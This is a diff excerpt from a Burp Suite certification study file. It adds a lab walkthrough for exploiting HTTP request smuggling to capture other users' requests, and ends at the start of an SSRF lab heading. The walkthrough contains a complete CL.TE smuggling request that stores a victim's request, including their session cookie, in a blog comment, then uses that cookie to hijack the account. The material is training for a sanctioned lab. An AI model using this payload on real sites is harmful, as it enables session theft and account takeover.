leggetth/Burp-Suite-Certified-Practitioner-Prep/Important Lab Solutions.md

 ---

+### Lab: Exploiting HTTP request smuggling to capture other users' requests

+1. Visit a blog post and post a comment.
+2. Send the `comment-post` request to Burp Repeater, shuffle the body parameters so the `comment` parameter occurs last, and make sure it still works.
+3. Increase the `comment-post` request's `Content-Length` to 400, then smuggle it to the back-end server:
+    `POST / HTTP/1.1
+    Host: your-lab-id.web-security-academy.net
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 256
+    Transfer-Encoding: chunked

+    0

+    POST /post/comment HTTP/1.1
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 400
+    Cookie: session=your-session-token

+    csrf=your-csrf-token&postId=5&name=Carlos+Montoya&email=carlos%40normal-user.net&website=&comment=test`
+4. View the blog post to see if there's a comment containing a user's request.
+Note that the target user only browses the website intermittently so you may need to repeat this attack a few times before it's successful.
+5. Copy the user's Cookie header from the comment, and use it to access their account.

+**Note**

+If the stored request is incomplete and doesn't include the Cookie header, you will need to slowly increase the value of the Content-Length header in the smuggled request, until the whole cookie is captured.

+---

 ### Lab: SSRF with blacklist-based input filter

 1. Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.